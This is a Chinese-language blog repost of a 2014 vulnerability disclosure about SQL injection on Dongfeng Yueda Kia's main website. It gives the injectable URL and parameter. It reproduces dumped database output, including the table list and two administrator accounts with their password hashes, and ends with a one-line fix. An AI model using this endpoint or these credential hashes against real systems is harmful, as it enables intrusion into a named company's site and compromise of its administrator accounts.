记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

东风悦达起亚主站SQL注入

2014-12-18 16:05

东风悦达起亚主站SQL注入,多库,可脱

主站:http://www.dyk.com.cn/promotion/index?type=89
 

1.png

 

当前数据库dyk_dyk:



Database: dyk_dyk
[32 tables]
+---------------------+
| ci_addonarticle |
| ci_admin |
| ci_admin_node |
| ci_admin_role |
| ci_arcatt |
| ci_archives |
| ci_arctiny |
| ci_arctype |
| ci_attachment |
| ci_captcha |
| ci_cartype |
| ci_channeltype |
| ci_citys |
| ci_common_cache |
| ci_log |
| ci_login_log |
| ci_member |
| ci_member_car |
| ci_member_msg |
| ci_member_qq |
| ci_member_sinaweibo |
| ci_menu |
| ci_provinces |
| ci_search |
| ci_search_keyword |
| ci_sendmsg_log |
| ci_serviceplan |
| ci_sessions |
| ci_stepselect |
| ci_sys_enum |
| ci_sysconfig |
| ci_table |
+---------------------+





admin账户:



Database: dyk_dyk
Table: ci_admin
[2 entries]
+----+---------+----------+---------+---------+---------------------------------
-+-----------+-------+---------+---------+---------+---------+---------+--------
--+----------+----------+------------+------------+------------+-------------+--
-------------+
| id | cardid | group_id | qq | msn | pass
| name | state | email | phone | posts | answer | mobile | questio
n | realname | birthday | loginCount | modifyTime | createTime | lastLoginIp | l
astLoginTime |
+----+---------+----------+---------+---------+---------------------------------
-+-----------+-------+---------+---------+---------+---------+---------+--------
--+----------+----------+------------+------------+------------+-------------+--
-------------+
| 2 | <blank> | 1 | <blank> | <blank> | fd6ae85c115d21c784ac7f3a3d9606a9
| admin | 1 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank>
| ????? | <blank> | 204 | 0 | 0 | 1875827014 | 1
414466431 |
| 5 | <blank> | 17 | <blank> | <blank> | 9c3782798090e60c81e5c5cc25c7225c
| dyk_admin | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank>
| ?? | <blank> | 256 | 0 | 0 | 1018097944 | 1
414765908 |
+----+---------+----------+---------+---------+---------------------------------
-+-----------+-------+---------+---------+---------+---------+---------+--------
--+----------+----------+------------+------------+------------+-------------+--
-------------+

 

解决方案:

过滤加防护


知识来源: www.2cto.com/Article/201412/362184.html

阅读:94367 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“东风悦达起亚主站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云